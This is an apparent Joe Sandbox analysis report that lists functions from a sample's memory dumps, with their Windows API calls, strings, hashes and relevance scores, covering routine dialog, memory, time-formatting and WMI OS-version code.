Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: c18a48048eabb96659b82272e0d74546e31ba1d9e54d3088bab0c7b2a6550d33
Instruction ID: 4615e957687a9f1cde149d9bcd92702f33c2635ffd8873bfa65dfffd35d8d9b2
Opcode Fuzzy Hash: c18a48048eabb96659b82272e0d74546e31ba1d9e54d3088bab0c7b2a6550d33
Instruction Fuzzy Hash: 08118E39210308AFD711DF65DC45BAB73F8EF08710F50446AF905E71A1EA709E44CB54

Function 00B4D076 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00B4D0A7

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: bcc4474bcf2e4c944e65b30e31477101b95d227a3138a853d52251af28da82a1
Instruction ID: bdb7c40ab28a98164cd331612fb2e1db1d1eb12274566168894102ddeb733205
Opcode Fuzzy Hash: bcc4474bcf2e4c944e65b30e31477101b95d227a3138a853d52251af28da82a1
Instruction Fuzzy Hash: D60146B4A00608CFDB28CF28EC91A9977F1FB58304F204259E91A973A1DF30AA49DB40

Function 00B50244 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B50284

Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13

Part of subcall function 00B53F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00B4F801,00000000,00000000,?,00B85070,?,00B4F801,?,?,00000050,?), ref: 00B53F64

_strlen.LIBCMT ref: 00B502A5
SetDlgItemTextW.USER32(?,00B82274,?), ref: 00B502FE
GetWindowRect.USER32(?,?), ref: 00B50334
GetClientRect.USER32(?,?), ref: 00B50340
GetWindowLongW.USER32(?,000000F0), ref: 00B503EB
GetWindowRect.USER32(?,?), ref: 00B5041B
SetWindowTextW.USER32(?,?), ref: 00B5044A
GetSystemMetrics.USER32(00000008), ref: 00B50452
GetWindow.USER32(?,00000005), ref: 00B5045D
GetWindowRect.USER32(00000000,?), ref: 00B5048D
GetWindow.USER32(00000000,00000002), ref: 00B504FF

Strings

d, xrefs: 00B50360
$%s:, xrefs: 00B5026D
CAPTION, xrefs: 00B50432

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 99f1a59a0794581db23eae442ffe22af3df1984ddb3a0b0df5f5cc69b2bd284d
Instruction ID: ffb4f1d2d12291da0d13d43e0c5c762b54ec3d8d9977a96c439825cc26e76983
Opcode Fuzzy Hash: 99f1a59a0794581db23eae442ffe22af3df1984ddb3a0b0df5f5cc69b2bd284d
Instruction Fuzzy Hash: 50817B72608301AFD714EF68CD89B6FBBE9EB89705F00095DF985A3250DB34E909CB52

Function 00B6F172 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00B6F1B6

Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6ED6E
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6ED80
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6ED92
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDA4
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDB6
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDC8
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDDA
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDEC
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EDFE
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EE10
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EE22
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EE34
Part of subcall function 00B6ED51: _free.LIBCMT ref: 00B6EE46

_free.LIBCMT ref: 00B6F1AB

Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22

_free.LIBCMT ref: 00B6F1CD
_free.LIBCMT ref: 00B6F1E2
_free.LIBCMT ref: 00B6F1ED
_free.LIBCMT ref: 00B6F20F
_free.LIBCMT ref: 00B6F222
_free.LIBCMT ref: 00B6F230
_free.LIBCMT ref: 00B6F23B
_free.LIBCMT ref: 00B6F273
_free.LIBCMT ref: 00B6F27A
_free.LIBCMT ref: 00B6F297
_free.LIBCMT ref: 00B6F2AF

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: a2dc53c68563d4c09cdfa222812bbdb2a4eb8ffeac0dfb263c39b874f139954c
Instruction ID: f500f5c9b468b9a503dce3c26b754103497cf15d7399bfb8f6a38675ed997966
Opcode Fuzzy Hash: a2dc53c68563d4c09cdfa222812bbdb2a4eb8ffeac0dfb263c39b874f139954c
Instruction Fuzzy Hash: 9D311832600606DFEB61AAA9E845BA673FAFF01350F2444A9F45AD6151DF79ED80CB10

Function 00B5F9EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00B5FA20
GetClassNameW.USER32(00000000,?,00000800), ref: 00B5FA4C

Part of subcall function 00B54168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B4E084,00000000,.exe,?,?,00000800,?,?,?,00B5AD5D), ref: 00B5417E

GetWindowLongW.USER32(00000000,000000F0), ref: 00B5FA68
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B5FA7F
GetObjectW.GDI32(00000000,00000018,?), ref: 00B5FA93
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B5FABC
DeleteObject.GDI32(00000000), ref: 00B5FAC3
GetWindow.USER32(00000000,00000002), ref: 00B5FACC

Strings

STATIC, xrefs: 00B5FA52

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 9397b134b393ecddf01e5a634121b8f9cae7928e753ff364cfd39df736f94edf
Instruction ID: 5ced3ba7b25cb0d16b21d58c8a37662f3e0ff80b06a917501bebdffabea470f1
Opcode Fuzzy Hash: 9397b134b393ecddf01e5a634121b8f9cae7928e753ff364cfd39df736f94edf
Instruction Fuzzy Hash: 1D2136325887117FE220AB749C4BFAFB6EDEB49702F0004A5FE45A6091DF748C0986A2

Function 00B6B8B1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B6B8C5

Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22

_free.LIBCMT ref: 00B6B8D1
_free.LIBCMT ref: 00B6B8DC
_free.LIBCMT ref: 00B6B8E7
_free.LIBCMT ref: 00B6B8F2
_free.LIBCMT ref: 00B6B8FD
_free.LIBCMT ref: 00B6B908
_free.LIBCMT ref: 00B6B913
_free.LIBCMT ref: 00B6B91E
_free.LIBCMT ref: 00B6B92C

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 14ca3117b02d29309c668ac87499fa7d2a8fcb82250148d134f2156bd898d40c
Instruction ID: 642dd2ec26ec9bff1c1d67737f49fbe77e4bbff448c0a99c17cb1fc5c3eb2c05
Opcode Fuzzy Hash: 14ca3117b02d29309c668ac87499fa7d2a8fcb82250148d134f2156bd898d40c
Instruction Fuzzy Hash: CE11A77A110148AFCB01EF99C992CD93BBAEF04350B0180A5FA098B122DB75EE91DB80

Function 00B65451 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B65570
___TypeMatch.LIBVCRUNTIME ref: 00B6567E
_UnwindNestedFrames.LIBCMT ref: 00B657D0
CallUnexpected.LIBVCRUNTIME ref: 00B657EB
_abort.LIBCMT ref: 00B657F0

Strings

csm, xrefs: 00B654FB
csm, xrefs: 00B655A7
csm, xrefs: 00B6548E

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 9ea9d88c51b92918634cab8101732e171fdf5a57099a5e0dc3c2eed75b208e18
Instruction ID: bb422b159268dad1159030066d739160fe19e8df4fbfe5d0c9bd8aa9e0213c01
Opcode Fuzzy Hash: 9ea9d88c51b92918634cab8101732e171fdf5a57099a5e0dc3c2eed75b208e18
Instruction Fuzzy Hash: DAB11571800A19EFCF25DFA4C881AAEB7F5FF14310F144599E8166B212D739DE61CBA1

Function 00B5B631 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B5B656
_wcslen.LIBCMT ref: 00B5B6F6
GlobalAlloc.KERNEL32(00000040,?), ref: 00B5B705
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B5B726

Strings

</html>, xrefs: 00B5B6D7
<html>, xrefs: 00B5B675, 00B5B6AE
utf-8"></head>, xrefs: 00B5B68B
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00B5B680

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: ec3239aa3dadff9a45f629f478e5c3761549d883663b6c158a9909bcfee2c338
Instruction ID: 38002ea03fa5a81a28316da4693272598f969d607764a8eb72c090f06aa480b5
Opcode Fuzzy Hash: ec3239aa3dadff9a45f629f478e5c3761549d883663b6c158a9909bcfee2c338
Instruction Fuzzy Hash: B131F3322083017AE725AB31DC46F6FB7DCDF95321F1401DAF905A61D2FFA8994983A6

Function 00B5D8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0

EndDialog.USER32(?,00000001), ref: 00B5D910
SendMessageW.USER32(?,00000080,00000001,0003046F), ref: 00B5D937
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B5D950
SetWindowTextW.USER32(?,?), ref: 00B5D961
GetDlgItem.USER32(?,00000065), ref: 00B5D96A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B5D97E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B5D994

Strings

LICENSEDLG, xrefs: 00B5D8D4

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 1978b8e408092eb43f0b6bcbddee4bc25b245bdde5bc3bd089958639b565a92d
Instruction ID: 519bc3e2df052a71d5ee4167e9e77d5f4dc4be13be48c5ec4967d84f4e49cb8f
Opcode Fuzzy Hash: 1978b8e408092eb43f0b6bcbddee4bc25b245bdde5bc3bd089958639b565a92d
Instruction Fuzzy Hash: F221D3322882047BE7215F65EC4AF3B7BECEB47B96F004599FA00A31A0DF6299059731

Function 00B4BF89 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B4BFA3

Part of subcall function 00B534D7: GetSystemTime.KERNEL32(?,00000000), ref: 00B534EF
Part of subcall function 00B534D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B534FD

Part of subcall function 00B53480: __aulldiv.LIBCMT ref: 00B53489

__aulldiv.LIBCMT ref: 00B4BFCF
GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 00B4BFD6
_swprintf.LIBCMT ref: 00B4C001

Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13

_wcslen.LIBCMT ref: 00B4C00B
_swprintf.LIBCMT ref: 00B4C061
_wcslen.LIBCMT ref: 00B4C06B

Strings

%u.%03u, xrefs: 00B4BFF1, 00B4C055

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
String ID: %u.%03u
API String ID: 2956649372-1114938957
Opcode ID: 21cf22e2f86a1acc3d146f53f02603c631f6843fef879b3011e54278d68b6e2f
Instruction ID: 72884c092d42fa22d1872e7dcb9ff5b8d6f0021070a951c1afdb91779569a8d7
Opcode Fuzzy Hash: 21cf22e2f86a1acc3d146f53f02603c631f6843fef879b3011e54278d68b6e2f
Instruction Fuzzy Hash: 86214172A053409FC664EF69CC86EAFB7ECEB84740F44499DF549D3352DA34DA0887A2

Function 00B5CBC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5CBEE
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B5CC05
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B5CC19
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5CC2A
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B5CC42
GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 00B5CC66
_swprintf.LIBCMT ref: 00B5CC85

Strings

%s %s, xrefs: 00B5CC7C

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Time$System$File$Format$DateLocalSpecific_swprintf
String ID: %s %s
API String ID: 385609497-2939940506
Opcode ID: 6547204d4d7ccdf2e61da2549d14a68e306954158e98f52268dfe27f0c6dd74d
Instruction ID: c4e5b99cdb287bf795e7397c6d764a6b32ae1b5eab946ccfe4519cac7f2a22b1
Opcode Fuzzy Hash: 6547204d4d7ccdf2e61da2549d14a68e306954158e98f52268dfe27f0c6dd74d
Instruction Fuzzy Hash: C2210CB290024CABDB11DFA5DD49EEE77FCEB49304F104566FA19D7012EA309A45CB60

Function 00B62360 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00B4CEA9,00B4CEAB,00000000,00000000,CEEE5757,00000001,00000000,00000000,?,00B4CD87,?,00000004,00B4CEA9,ROOT\CIMV2), ref: 00B623E9
MultiByteToWideChar.KERNEL32(00000000,00000000,00B4CEA9,?,00000000,00000000,?,?,00B4CD87,?,00000004,00B4CEA9), ref: 00B62464
SysAllocString.OLEAUT32(00000000), ref: 00B6246F
_com_issue_error.COMSUPP ref: 00B62498
_com_issue_error.COMSUPP ref: 00B624A2
GetLastError.KERNEL32(80070057,CEEE5757,00000001,00000000,00000000,?,00B4CD87,?,00000004,00B4CEA9,ROOT\CIMV2), ref: 00B624A7
_com_issue_error.COMSUPP ref: 00B624BA
GetLastError.KERNEL32(00000000,?,00B4CD87,?,00000004,00B4CEA9,ROOT\CIMV2), ref: 00B624D0
_com_issue_error.COMSUPP ref: 00B624E3

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 2422e86657bce6f1d4ee1b7a7cd967ed1b00131ec07b6d5ea030048161c8901c
Instruction ID: 940003d74d630760a27fe0b24286d3eb66a95e424b193923af664ff7706061bf
Opcode Fuzzy Hash: 2422e86657bce6f1d4ee1b7a7cd967ed1b00131ec07b6d5ea030048161c8901c
Instruction Fuzzy Hash: 3441EA71A00705AFEB149F64DC45BAEBBE8FB48710F1082A9F609E7351DB3D9840C7A5

Function 00B4CE64 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B4CE6B
VariantClear.OLEAUT32(?), ref: 00B4D015

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 00B4CF2C
ROOT\CIMV2, xrefs: 00B4CE99
Windows 10, xrefs: 00B4CFFB
Name, xrefs: 00B4CFE9
WQL, xrefs: 00B4CF3E

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ClearH_prolog3Variant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3629354427-3505469590
Opcode ID: 8662a4135dc4df068a8e53e43008ff9da92761e62988d3f700b8ab2706337539
Instruction ID: 2b556780f8c1bef13e061823922c6b691aa1b9a67143895d0716b99d8403161a
Opcode Fuzzy Hash: 8662a4135dc4df068a8e53e43008ff9da92761e62988d3f700b8ab2706337539
Instruction Fuzzy Hash: 2A718C30A01619AFDB54DFA4CC94DBEBBF9FF48710B0041A9F516A72A0CB34AE05DB60

Function 00B532F8 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00B5331D

Part of subcall function 00B4D076: GetVersionExW.KERNEL32(?), ref: 00B4D0A7
